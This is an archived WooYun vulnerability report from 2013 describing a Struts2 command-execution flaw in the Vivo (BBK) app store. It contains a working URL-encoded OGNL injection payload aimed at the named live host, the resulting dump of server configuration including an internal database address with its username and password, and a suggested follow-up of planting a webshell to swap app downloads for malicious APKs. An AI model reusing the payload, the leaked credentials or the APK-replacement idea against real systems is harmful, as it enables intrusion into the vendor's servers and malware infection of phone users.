当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-045237

漏洞标题:步步高vivo应用商店命令执行漏洞

相关厂商:步步高

漏洞作者: j2ck3r

提交时间:2013-12-07 18:34

修复时间:2014-01-21 18:34

公开时间:2014-01-21 18:34

漏洞类型:系统/服务补丁不及时

危害等级:中

自评Rank:5

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-12-07: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-01-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

步步高vivo应用商店命令执行漏洞

详细说明:

步步高vivo应用商店命令执行漏洞

漏洞证明:

在看VIVO手机应用商店的时候,看到下载的连接指向
http://appstore.bbk.com/appinfo/downloadApkFile?id=40439

w1.jpg


好奇心,趋势下进入这里
http://appstore.bbk.com:8080/login.jsp 发现是应用商店的后台管理页面

w.jpg


试试了几个弱口令都不能进去
看了下网站是架设,怀疑是struts第三方框架
回到刚才那边下载地址。测试下struts漏洞
http://appstore.bbk.com/appinfo/downloadApkFile?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D
成功了

w2.jpg


网站物理路径: /opt/app/appstore/appconsole
java.home: /usr/java/jdk1.6.0_26/jre
java.version: 1.6.0_26
os.name: Linux
os.arch: amd64
os.version: 2.6.18-308.16.1.el5
user.name: appstore
user.home: /home/appstore
user.dir: /opt/app/appstore/apache-tomcat-6.0.32/bin
java.class.version: 50.0
java.class.path: /opt/app/appstore/apache-tomcat-6.0.32/bin/bootstrap.jar
java.library.path: /usr/java/jdk1.6.0_26/jre/lib/amd64/server:/usr/java/jdk1.6.0_26/jre/lib/amd64:/usr/java/jdk1.6.0_26/jre/../lib/amd64:/usr/java/packages/lib/amd64:/usr/lib64:/lib64:/lib:/usr/lib
file.separator: /
path.separator: :
java.vendor: Sun Microsystems Inc.
java.vendor.url: http://java.sun.com/
java.vm.specification.version: 1.0
java.vm.specification.vendor: Sun Microsystems Inc.
java.vm.specification.name: Java Virtual Machine Specification
java.vm.version: 20.1-b02
java.vm.vendor: Sun Microsystems Inc.
java.vm.name: Java HotSpot(TM) 64-Bit Server VM
java.specification.version: 1.6
java.specification.vender: 
java.specification.name: Java Platform API Specification
java.io.tmpdir: /opt/app/appstore/apache-tomcat-6.0.32/temp
hibernate信息
-- listing properties --
java.vendor=Sun Microsystems Inc.
show_sql=false
sun.java.launcher=SUN_STANDARD
catalina.base=/opt/app/appstore/apache-tomcat-6.0.32
hibernate.connection.url=jdbc:mysql://10.2.2.121:3307/appstore...
sun.management.compiler=HotSpot 64-Bit Tiered Compilers
catalina.useNaming=true
os.name=Linux
sun.boot.class.path=/usr/java/jdk1.6.0_26/jre/lib/resourc...
java.util.logging.config.file=/opt/app/appstore/apache-tomcat-6.0.3...
hibernate.c3p0.max_size=12
java.vm.specification.vendor=Sun Microsystems Inc.
java.runtime.version=1.6.0_26-b03
hibernate.c3p0.min_size=5
user.name=appstore
shared.loader=
tomcat.util.buf.StringCache.byte.enabled=true
hibernate.session_factory_name=sf
hibernate.c3p0.timeout=30
user.language=en
java.naming.factory.initial=org.apache.naming.java.javaURLContext...
sun.boot.library.path=/usr/java/jdk1.6.0_26/jre/lib/amd64
dialect=org.hibernate.dialect.MySQLDialect
java.version=1.6.0_26
java.util.logging.manager=org.apache.juli.ClassLoaderLogManager
user.timezone=Asia/Shanghai
sun.arch.data.model=64
java.endorsed.dirs=/opt/app/appstore/apache-tomcat-6.0.3...
sun.cpu.isalist=
sun.jnu.encoding=UTF-8
file.encoding.pkg=sun.io
package.access=sun.,org.apache.catalina.,org.apache....
file.separator=/
java.specification.name=Java Platform API Specification
java.class.version=50.0
user.country=US
java.home=/usr/java/jdk1.6.0_26/jre
java.vm.info=mixed mode
os.version=2.6.18-308.16.1.el5
hibernate.transaction.factory_class=org.hibernate.transaction.JDBCTransac...
path.separator=:
java.vm.version=20.1-b02
hibernate.connection.password=appstore
java.awt.printerjob=sun.print.PSPrinterJob
sun.io.unicode.encoding=UnicodeLittle
hibernate.connection.username=appstore
package.definition=sun.,java.,org.apache.catalina.,org.a...
java.naming.factory.url.pkgs=org.apache.naming
user.home=/home/appstore
java.specification.vendor=Sun Microsystems Inc.
java.library.path=/usr/java/jdk1.6.0_26/jre/lib/amd64/s...
java.vendor.url=http://java.sun.com/
hibernate.connection.driver_class=com.mysql.jdbc.Driver
java.vm.vendor=Sun Microsystems Inc.
hibernate.dialect=org.hibernate.dialect.MySQLDialect
common.loader=${catalina.base}/lib,${catalina.base}...
java.runtime.name=Java(TM) SE Runtime Environment
sun.java.command=org.apache.catalina.startup.Bootstrap...
java.class.path=/opt/app/appstore/apache-tomcat-6.0.3...
hibernate.bytecode.use_reflection_optimizer=false
java.vm.specification.name=Java Virtual Machine Specification
java.vm.specification.version=1.0
catalina.home=/opt/app/appstore/apache-tomcat-6.0.32
sun.cpu.endian=little
sun.os.patch.level=unknown
hibernate.connection.provider_class=org.hibernate.connection.C3P0Connecti...
java.io.tmpdir=/opt/app/appstore/apache-tomcat-6.0.3...
java.vendor.url.bug=http://java.sun.com/cgi-bin/bugreport...
server.loader=
os.arch=amd64
java.awt.graphicsenv=sun.awt.X11GraphicsEnvironment
java.ext.dirs=/usr/java/jdk1.6.0_26/jre/lib/ext:/us...
user.dir=/opt/app/appstore/apache-tomcat-6.0.3...
hibernate.c3p0.idle_test_period=15
line.separator=
java.vm.name=Java HotSpot(TM) 64-Bit Server VM
hibernate.c3p0.acquire_increment=2
file.encoding=UTF-8
java.specification.version=1.6
hibernate.c3p0.max_statements=100
hibernate.show_sql=false


你以为这样就完了吗,突然有个邪恶的思路,上传WEBSHELL,把装有恶意代码APK文件替换掉网站上正常的APK文件,手机用户一旦下载就中招了。
这里是个思路,就不测试了,危害过大。

修复方案:

你们懂的,求礼物!

版权声明:转载请注明来源 j2ck3r@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝